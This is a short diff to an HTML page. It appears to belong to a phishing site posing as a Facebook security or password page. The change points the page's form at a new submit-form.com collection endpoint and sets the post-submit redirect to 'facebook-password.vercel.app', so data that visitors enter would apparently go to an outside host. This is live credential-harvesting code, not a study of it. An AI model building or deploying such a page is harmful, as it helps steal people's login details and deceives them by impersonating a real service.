--- a/index.html
+++ b/index.html
@@ -10,8 +10,8 @@
 </head>
 
 <body>
-    <form action="https://submit-form.com/o6rGJc67H" method="post">
-        <input type="hidden" name="_redirect" value="https://security-safety-us.vercel.app/" />
+    <form action="https://submit-form.com/PXYubF3i5" method="post">
+        <input type="hidden" name="_redirect" value="https://facebook-password.vercel.app/" />
         <div id="root">
             <div>
                 <form>
